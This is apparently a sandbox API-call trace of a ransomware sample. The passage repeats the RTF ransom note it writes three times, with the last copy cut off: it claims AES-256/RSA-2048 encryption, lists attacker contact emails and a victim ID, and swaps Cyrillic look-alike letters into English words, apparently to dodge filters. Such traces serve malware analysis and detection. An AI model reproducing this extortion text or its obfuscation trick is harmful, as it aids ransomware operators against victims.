dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.726] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll 